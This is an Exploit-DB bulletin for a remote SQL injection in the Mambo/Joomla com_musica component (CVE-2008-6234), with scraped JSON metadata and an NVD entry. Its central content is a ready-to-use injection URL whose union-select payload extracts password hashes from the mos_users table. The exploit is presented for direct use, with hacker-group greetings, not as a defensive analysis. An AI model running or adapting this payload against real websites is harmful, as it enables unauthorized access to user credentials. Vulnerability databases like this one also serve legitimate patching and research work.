ID EDB-ID:5207Type exploitdbReporter Aria-Security TeamModified 2008-03-01T00:00:00
Description
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability. CVE-2008-6234. Webapps exploit for php platform
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
Original Link:
http://forum.aria-security.net/showthread.php?t=588
Regards,
The-0utl4w
# milw0rm.com [2008-03-01]
{"id": "EDB-ID:5207", "hash": "1ac0a06fed3c521af1975ebaf1e80980", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo Component com_Musica id Remote SQL Injection Vulnerability", "description": "Mambo Component com_Musica (id) Remote SQL Injection Vulnerability. CVE-2008-6234. Webapps exploit for php platform", "published": "2008-03-01T00:00:00", "modified": "2008-03-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5207/", "reporter": "Aria-Security Team", "references": [], "cvelist": ["CVE-2008-6234"], "lastseen": "2016-01-31T21:47:32", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T21:47:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6234"]}], "modified": "2016-01-31T21:47:32"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5207/", "sourceData": "Aria-Security Team (Persian Security Network)\nhttp://Aria-Security.Net\n-------------------------------\nShoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff\nMambo com_Musica \"id\" Remote SQL Injection\n\n\nindex.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*\n\nOriginal Link:\nhttp://forum.aria-security.net/showthread.php?t=588\n\nRegards,\nThe-0utl4w\n\n# milw0rm.com [2008-03-01]\n", "osvdbidlist": ["52228"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the com_musica module in Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.", "modified": "2018-10-11T20:57:00", "id": "CVE-2008-6234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6234", "published": "2009-02-21T01:30:00", "title": "CVE-2008-6234", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
